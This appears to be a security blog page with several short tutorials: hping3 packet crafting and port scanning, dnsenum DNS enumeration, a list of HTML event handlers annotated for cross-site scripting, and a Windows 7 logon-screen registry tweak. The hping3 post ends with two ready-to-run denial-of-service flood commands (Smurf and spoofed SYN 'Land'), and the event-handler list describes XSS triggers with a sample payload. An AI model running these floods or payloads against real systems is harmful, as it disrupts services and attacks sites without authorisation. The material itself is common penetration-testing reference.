Zer0w0rm

Welcome Back...



Hello All,

Over a long time, it's been almost 2 year... Finally I could make it to update my blog.

I have one good news for you people. I just completed my OSCP certification and I am planning to give review on it soon.

From now onwards I am going to post every weekend, so stay tune with me.;)


Thank you (zer0w0rm)
READMORE
 

Hping3 Tutorial With firewall

Hello, Today I will show you how to use hping3 for network mapping.

Hping3 :-->
Hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation, and almost arbitrary packet size and content, using the command line interface.

  1. Testing ICMP :

    hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply

    hping3 -1 [Ip_Address]
  2.  Traceroute using ICMP :

    In this example tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.

    hping3 --traceroute -V -1 [Ip_Address]
     
  3. Checking port :

    Hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).

    hping3 -V -S -p 80 -s 5050 [Ip_Address]

  4. Traceroute to a determined port :

    Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked.

    hping3 --traceroute -V -S -p 80 -s 5050 [Ip_Address]
  5. Other types of ICMP :

    This example sends a ICMP address mask request ( Type 17 ).

    hping3 -c 1 -V -1 -C 17 [Ip_Address]
  6. Other types of Port Scanning :

    First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..

    hping3 -c 1 -V -p 80 -s 5050 -F [Ip_Address]
  7. Ack Scan :

    This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.

    hping3 -c 1 -V -p 80 -s 5050 -A [Ip_Address]
  8. Xmas Scan :

    This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF [Ip_Address]
  9. Null Scan :

    This scan sets the sequence number to zero and have no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.

    hping3 -c 1 -V -p 80 -s 5050 -Y [Ip_Address]

  10. Smurf Attack :

    This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

    hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
     
  11. DOS Land Attack :
    hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP


Thank you (zer0w0rm)
READMORE
 

Dnsenum using information gathering tutorial

Hello Guys 

Today I will show you DNSENUM information gathering tool.

DNSenum is a pentesting tool created to enumerate DNS info about domains.

The purpose of Dnsenum is to gather as much information as possible about a domain

DNSenum is a very important tool to perform a quick enumeration step on penetration testing.
    Host address
    Name server
    MX record
    Sub domains
    Whois performance
    Reverse lookup for netblocks
    Use google to do the job done

use:
------------------------------------------------------------------
1)Simple scan
     dnsenum google.com

2)Powerful scan use
     dnsenum --enum google.com

3)More power scan with sub domains
     dnsenum --enum -f -r google.com

Note:

if you get error like this

Warning: can't load Net::Whois::IP module, whois queries disabled.

--> apt-get install cparminus
--> cpanm -n Net::Whois::IP




Thank you (zer0w0rm)


READMORE
 

HTML event handlers

Hello Today I will share with you some HTML event handlers which is use in xss and any web event handler .

1.    FSCommand() (attacker can use this when executed from within an embedded Flash object)
2.    onAbort() (when user aborts the loading of an image)
3.    onActivate() (when object is set as the active element)
4.    onAfterPrint() (activates after user prints or previews print job)
5.    onAfterUpdate() (activates on data object after updating data in the source object)
6.    onBeforeActivate() (fires before the object is set as the active element)
7.    onBeforeCopy() (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand("Copy") function)
8.    onBeforeCut() (attacker executes the attack string right before a selection is cut)
9.    onBeforeDeactivate() (fires right after the activeElement is changed from the current object)
10.    onBeforeEditFocus() (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
11.    onBeforePaste() (user needs to be tricked into pasting or be forced into it using the execCommand("Paste") function)
12.    onBeforePrint() (user would need to be tricked into printing or attacker could use the print() or execCommand("Print") function).
13.    onBeforeUnload() (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
14.    onBegin() (the onbegin event fires immediately when the element's timeline begins)
15.    onBlur() (in the case where another popup is loaded and window looses focus)
16.    onBounce() (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
17.    onCellChange() (fires when data changes in the data provider)
18.    onChange() (select, text, or TEXTAREA field loses focus and its value has been modified)
19.    onClick() (someone clicks on a form)
20.    onContextMenu() (user would need to right click on attack area)
21.    onControlSelect() (fires when the user is about to make a control selection of the object)
22.    onCopy() (user needs to copy something or it can be exploited using the execCommand("Copy") command)
23.    onCut() (user needs to copy something or it can be exploited using the execCommand("Cut") command)
24.    onDataAvailable() (user would need to change data in an element, or attacker could perform the same function)
25.    onDataSetChanged() (fires when the data set exposed by a data source object changes)
26.    onDataSetComplete() (fires to indicate that all data is available from the data source object)
27.    onDblClick() (user double-clicks a form element or a link)
28.    onDeactivate() (fires when the activeElement is changed from the current object to another object in the parent document)
29.    onDrag() (requires that the user drags an object)
30.    onDragEnd() (requires that the user drags an object)
31.    onDragLeave() (requires that the user drags an object off a valid location)
32.    onDragEnter() (requires that the user drags an object into a valid location)
33.    onDragOver() (requires that the user drags an object into a valid location)
34.    onDragDrop() (user drops an object (e.g. file) onto the browser window)
35.    onDrop() (user drops an object (e.g. file) onto the browser window)
36.    onEnd() (the onEnd event fires when the timeline ends.  This can be exploited, like most of the HTML+TIME event handlers by doing something like <P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')">)
37.    onError() (loading of a document or image causes an error)
38.    onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
39.    onFilterChange() (fires when a visual filter completes state change)
40.    onFinish() (attacker can create the exploit when marquee is finished looping)
41.    onFocus() (attacker executes the attack string when the window gets focus)
42.    onFocusIn() (attacker executes the attack string when window gets focus)
43.    onFocusOut() (attacker executes the attack string when window looses focus)
44.    onHelp() (attacker executes the attack string when users hits F1 while the window is in focus)
45.    onKeyDown() (user depresses a key)
46.    onKeyPress() (user presses or holds down a key)
47.    onKeyUp() (user releases a key)
48.    onLayoutComplete() (user would have to print or print preview)
49.    onLoad() (attacker executes the attack string after the window loads)
50.    onLoseCapture() (can be exploited by the releaseCapture() method)
51.    onMediaComplete() (When a streaming media file is used, this event could fire before the file starts playing)
52.    onMediaError() (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
53.    onMouseDown() (the attacker would need to get the user to click on an image)
54.    onMouseEnter() (cursor moves over an object or area)
55.    onMouseLeave() (the attacker would need to get the user to mouse over an image or table and then off again)
56.    onMouseMove() (the attacker would need to get the user to mouse over an image or table)
57.    onMouseOut() (the attacker would need to get the user to mouse over an image or table and then off again)
58.    onMouseOver() (cursor moves over an object or area)
59.    onMouseUp() (the attacker would need to get the user to click on an image)
60.    onMouseWheel() (the attacker would need to get the user to use their mouse wheel)
61.    onMove() (user or attacker would move the page)
62.    onMoveEnd() (user or attacker would move the page)
63.    onMoveStart() (user or attacker would move the page)
64.    onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
65.    onPaste() (user would need to paste or attacker could use the execCommand("Paste") function)
66.    onPause() (the onpause event fires on every element that is active when the timeline pauses, including the body element)
67.    onProgress() (attacker would use this as a flash movie was loading)
68.    onPropertyChange() (user or attacker would need to change an element property)
69.    onReadyStateChange() (user or attacker would need to change an element property)
70.    onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
71.    onReset() (user or attacker resets a form)
72.    onResize() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
73.    onResizeEnd() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
74.    onResizeStart() (user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>)
75.    onResume() (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
76.    onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
77.    onRowsEnter() (user or attacker would need to change a row in a data source)
78.    onRowExit() (user or attacker would need to change a row in a data source)
79.    onRowDelete() (user or attacker would need to delete a row in a data source)
80.    onRowInserted() (user or attacker would need to insert a row in a data source)
81.    onScroll() (user would need to scroll, or attacker could use the scrollBy() function)
82.    onSeek() (the onreverse event fires when the timeline is set to play in any direction other than forward)
83.    onSelect() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
84.    onSelectionChange() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
85.    onSelectStart() (user needs to select some text - attacker could auto initialize with something like: window.document.execCommand("SelectAll");)
86.    onStart() (fires at the beginning of each marquee loop)
87.    onStop() (user would need to press the stop button or leave the webpage)
88.    onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
89.    onSubmit() (requires attacker or user submits a form)
90.    onTimeError() (user or attacker sets a time property, such as dur, to an invalid value)
91.    onTrackChange() (user or attacker changes track in a playList)
92.    onUnload() (as the user clicks any link or presses the back button or attacker forces a click)
93.    onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
94.    seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)



Thank you (zer0w0rm)
READMORE
 

How to Change Windows 7 Logon Screen ?

How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.


1. The image you need to set as the background should be a .jpg file and it's size should not exceed 245KB.
 
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your
image. Once you're done, save this image as background.jpg.
 
3. You will need to copy this image to
C://Windows/system32/oobe/backgrounds
You will need to create that path if it does not already exist on your computer.
 
4. Now open the Registry Editor (Start -> Run -> Type regedit) and
navigate to the following key
HKLM>Software>Microsoft>Windows>CurrentVersion>Authentication>LogonUI>Background
If Background does not existrightclickLogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and
select New and then DWORD and name it OEMBackground.
 
5. Double-click on OEMBackground and set the Value Data to 1.
 
6. Now log-off to see the new logon screen background

Thank you (zer0w0rm)
READMORE